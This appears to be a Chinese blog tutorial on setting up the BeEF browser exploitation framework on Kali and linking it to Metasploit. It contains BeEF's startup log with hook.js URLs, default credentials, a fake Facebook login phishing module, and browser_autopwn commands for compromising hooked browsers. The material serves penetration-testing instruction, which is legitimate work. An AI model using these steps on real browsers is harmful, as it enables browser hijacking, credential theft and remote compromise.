GitHub: https://github.com/beefproject/beef
kali启动beef:
/usr/share/beef-xss# ./beef
[15:07:21][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[15:07:21][*] Browser Exploitation Framework (BeEF) 0.4.7.0-alpha #版本号
[15:07:21] | Twit: @beefproject
[15:07:21] | Site: http://beefproject.com
[15:07:21] | Blog: http://blog.beefproject.com
[15:07:21] |_ Wiki: https://github.com/beefproject/beef/wiki
[15:07:21][*] Project Creator: Wade Alcorn (@WadeAlcorn)
[15:07:21][*] Successful connection with Metasploit.
[15:07:21][*] Loaded 298 Metasploit exploits.
[15:07:21][*] BeEF is loading. Wait a few seconds...
[15:07:24][*] 13 extensions enabled.
[15:07:24][*] 552 modules enabled. #一共加载多少模块
[15:07:24][*] 2 network interfaces were detected.
[15:07:24][+] running on network interface: 127.0.0.1
[15:07:24] | Hook URL: http://127.0.0.1:3000/hook.js
[15:07:24] |_ UI URL: http://127.0.0.1:3000/ui/panel #登录界面
[15:07:24][+] running on network interface: 192.168.1.105
[15:07:24] | Hook URL: http://192.168.1.105:3000/hook.js
[15:07:24] |_ UI URL: http://192.168.1.105:3000/ui/panel
[15:07:24][*] RESTful API key: 893473366f7e05666f0a11c01c9fb6049c07d305
[15:07:24][*] HTTP Proxy: http://127.0.0.1:6789
[15:07:24][*] BeEF server started (press control+c to stop)
默认账号密码都是beef;修改配置 /usr/share/beef-xss/config.yaml 结合Metasploit框架配置文件:/usr/share/beef-xss/extensions/metasploit/config.yaml
登录打开控制台:
如果beef布置在公网服务器上,要修改配置文件,不然都可以登录访问控制台!!!

左侧显示被勾住的浏览器:
双击目标可以显示详细信息

双击显示浏览器详细信息

绿色:表示该命令模块对目标可使用,将被检查到
橙色:表示该命令模块对目标可使用,可能被检查到
灰色:表示该命令模块尚未得到目标验证
红色:表示该命令模块针对目标不一定可使用

选中勾住的浏览目标可设置为代理,并将通过该浏览器代理挂钩网站所在域内的网站。
设置为代理 在Rider模块查看信息:

社会工程模块使用:

弹框Facebook登录界面:

查看记录能看到历史的记录:

使用metasploit结合Beef使用:
load msgrpc ServerHost=IP Pass=pass
use auxiliary/server/browser_autopwn
set URIPATH /
set LHOST IP
run
启动./beef -x
访问控制台能看到metasploit模块的数量增多了。


单个使用不一定有效 在设置URIPATH的时候set的 / 这样又便于使用多的模块展开攻击,只要给浏览器发送 例如:http://192.168.1.1:8080/

选完要使用的模块后:


msf终端查看sessions
5242

被折叠的 条评论
为什么被折叠?



